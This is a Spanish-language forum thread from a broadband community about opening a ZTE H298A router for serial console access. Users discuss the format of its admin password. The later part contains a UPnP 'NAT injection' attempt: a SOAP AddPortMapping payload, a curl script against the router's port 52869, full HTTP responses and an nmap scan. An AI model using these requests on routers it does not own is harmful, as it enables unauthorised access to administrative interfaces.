Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

Fibra

Abrir el router ZTE H298A parar conectar cable USB PL2303

BocaDePez
BocaDePez

He comprado un cable Prolific "Technology, Inc. PL2303 Serial Port" con 5 pines al aire, pero no sé varias cosas:

  • ¿Cuál es cada PIN? Sé que me interesan 3 pines: tierra (GR), envío (TX) y recepción (RX) pero no sé cuál es cuál.
  • ¿Cómo abro el router ZTE H298A? Tiene unas patillas como de goma que hacen que no se escurra. No sé si hay que tirar de esas patillas y luego queda visible algún tornillo para desmontarlo.
  • Una vez que abro el router y veo la placa, he visto que tengo que mirar los 4 pines que haya y luego localizar el número 1 que se supone que va a la izquierda y a partir de ahí, el número 1 al aire y luego TX, RX y GR. No sé si es así o no. ¿Cómo hago corresponder eso con los pines del USB?

Muchas gracias a todos.

Tengo la contraseña del usuario admin y supongo que si logro conectar eso podré acceder a la consola del router directamente.

BocaDePez
BocaDePez

Vale, he encontrado por detrás del conector USB que vienen indicados los pines, 3.3V, 5.0V, TXD, RXD y GND. Por detrás pone USB-TTL y USB-STC-ISP.

Lo que más me urge ahora es cómo abrir el router sin romper nada.

Muchas gracias.

BocaDePez
BocaDePez

Https://bandaancha.eu/foros/desmontando-router-zxhn-h298a-1735364

Por aquí tienes mucha info, donde soldar pos pines e.t.c.

🗨️ 13
BocaDePez
BocaDePez

Gracias, pero ¿cómo abro el router?

🗨️ 12
BocaDePez
BocaDePez

Pues el router blanquito este... Tiene dos patitas de goma justo debajo de las lucecitas led del router(esas que te dicen que tienes linea, power, etc.).

Pues las quitas que can con un adhesivo, debajo de esas gomitas tienes unos tornillitos de estrella.

Los desatornillas y habres la tapa por ahí , a la vez que se o sueltas las pestañas que tiene en el lado opuesto. Es mas fácil de lo que parece.

Un saludo

🗨️ 11
BocaDePez
BocaDePez

He quitado dos tornillos de dos patillas pero luego la tapa está como pegada. Si intento abrirla la rompo porque está como sujeta. No me arriesgo a romper la tapa. Debe ser otro modelo lo que indicas. Este modelo está como sellado.

🗨️ 10
BocaDePez
BocaDePez
🗨️ 9
BocaDePez
BocaDePez
🗨️ 8
BocaDePez
BocaDePez
BocaDePez
BocaDePez
🗨️ 6
BocaDePez
BocaDePez
🗨️ 5
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez

Hola, si sabes la contraseña de admin, nos podrías iluminar como la conseguiste, como es o cual es su patrón.

Un saludo.

🗨️ 7
BocaDePez
BocaDePez

Conseguí la contraseña admin a partir de un backup de la configuración del router que con el firmware TI se podía obtener.

🗨️ 6
BocaDePez
BocaDePez

Hola, yo entendía que con la ultima actualización cambiaron la contraseña de admin, en teoría la tuya tampoco vale, o si?. Si aun te vale es que la cambiaron para nuevos clientes o tiene algún parametro esclusibo por cliente.

No se si me esplico....

No obstante nos podías facilitar dicha contraseña si no es esclusiva por cliente, con lo cual no la compartas si guarda relacion con el cliente. Facilitandonos el patrón, numero de dígitos, cuantos números y letras tiene y si hay mayúsculas o minúsculas o símbolos raros.

Un saludo.

🗨️ 5
BocaDePez
BocaDePez

A ver, la contraseña admin la obtuve con la versión de firmware T8 y te confirmo que sigue siendo la misma que en la versión T10 del firmware.

No recuerdo la contraseña, pero es del estilo de la contraseña pppoe, letras mayúsculas y minúsculas y algún número.

BocaDePez
BocaDePez

La clave pppoe son 8 caracteres con letras mayúsculas y minúsculas. En mi caso no tiene números.

La clave admin son 10 caracteres con letras mayúsculas y minúsculas y también con números.

No hay caracteres especiales como , ; @ # etc.

🗨️ 3
BocaDePez
BocaDePez
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez
1

Estoy intentando el 'exploit' pero no hay manera:

Contenido de SOAP_NAT.xml:

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schema.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelopes/">
  <s:Body>
    <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
        <NewRemoteHost></NewRemoteHost>
        <NewExternalPort>5555</NewExternalPort>
        <NewInternalClient>192.168.1.1</NewInternalClient>
        <NewInternalPort>80</NewInternalPort>
        <NewProtocol>TCP</NewProtocol>
        <NewPortMappingDescription>i_want_admin</NewPortMappingDescription>
        <NewLeaseDuration>10</NewLeaseDuration>
        <NewEnabled>1</NewEnabled>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>

Contenido de nat_injection.sh:

curl -v \
 -H 'Content-Type: text/xml; charset="utf-8"' \
 -H 'Connection: close' \
 -H 'SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1"' \
 --data @SOAP_NAT.xml \
 "http://192.168.1.1:52869/upnp/control/WANIPConn1"

La salida que obtengo es la de un error interno 500:

*   Trying 192.168.1.1:52869...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 52869 (#0)
> POST /upnp/control/WANIPConn1 HTTP/1.1
> Host: 192.168.1.1:52869
> User-Agent: curl/7.66.0
> Accept: */*
> Content-Type: text/xml; charset="utf-8"
> Connection: close
> SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1"
> Content-Length: 681
>
* upload completely sent off: 681 out of 681 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< CONTENT-LENGTH: 451
< CONTENT-TYPE: text/xml; charset="utf-8"
< DATE: Sat, 16 Nov 2019 11:20:22 GMT
< EXT:
< SERVER: Linux, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
< X-User-Agent: redsonic
<
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<s:Fault>
<faultcode>s:Client</faultcode>
<faultstring>UPnPError</faultstring>
<detail>
<UPnPError xmlns="urn:schemas-upnp-org:control-1-0">
<errorCode>401</errorCode>
<errorDescription>Invalid Action</errorDescription>
</UPnPError>
</detail>
</s:Fault>
</s:Body>
</s:Envelope>
* Connection #0 to host 192.168.1.1 left intact

Estoy tomando como parámetros los que devuelve la información de http://192.168.1.1:52869/gatedesc.xml:

<service>
<serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
<controlURL>/upnp/control/WANIPConn1</controlURL>
<eventSubURL>/upnp/control/WANIPConn1</eventSubURL>
<SCPDURL>/gateconnSCPD.xml</SCPDURL>
</service>
🗨️ 6
BocaDePez
BocaDePez

No digo que sea el caso pero si upnp está desactivado eso no te va a funcionar.

🗨️ 1
BocaDePez
BocaDePez
1

Lo tengo activado y además el puerto 52869 está abierto:

nmap 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.014s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
52869/tcp open  unknown
BocaDePez
BocaDePez
1

He conseguido que funcione, ahora devuelve un 200 OK, pero no hace nada.

SOAP_NAT.xml:

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
        <NewRemoteHost></NewRemoteHost>
        <NewExternalPort>5555</NewExternalPort>
        <NewInternalClient>192.168.1.1</NewInternalClient>
        <NewInternalPort>80</NewInternalPort>
        <NewProtocol>TCP</NewProtocol>
        <NewPortMappingDescription>node:nat:upnp</NewPortMappingDescription>
        <NewLeaseDuration>10</NewLeaseDuration>
        <NewEnabled>1</NewEnabled>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>

nat_injection.sh:

curl -v \
 -H 'Content-Type: text/xml; charset="utf-8"' \
 -H 'Connection: close' \
 -H 'SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"' \
 --data @SOAP_NAT.xml \
 "http://192.168.1.1:52869/upnp/control/WANIPConn1"

Respuesta:

*   Trying 192.168.1.1:52869...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 52869 (#0)
> POST /upnp/control/WANIPConn1 HTTP/1.1
> Host: 192.168.1.1:52869
> User-Agent: curl/7.66.0
> Accept: */*
> Content-Type: text/xml; charset="utf-8"
> Connection: close
> SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
> Content-Length: 682
>
* upload completely sent off: 682 out of 682 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< CONTENT-LENGTH: 309
< CONTENT-TYPE: text/xml; charset="utf-8"
< DATE: Sat, 16 Nov 2019 12:23:01 GMT
< EXT:
< SERVER: Linux, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
< X-User-Agent: redsonic
<
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:AddPortMappingResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"></u:AddPortMappingResponse>
</s:Body>
</s:Envelope>
* Connection #0 to host 192.168.1.1 left intact

Debería devolver algo dentro de la etiqueta 'AddPortMappingResponse', supongo que los nuevos valores de 'NewExternalPort', etc. pero no devuelve nada.

🗨️ 3
BocaDePez
BocaDePez

A mi me estrañaria que estuviera parcheada esta bulneravilidad, que es un zte y de los cutres ;).

dpatrongomez

He creado un grupo en Telegram para poder colaborar entre nosotros:

🗨️ 1
BocaDePez
BocaDePez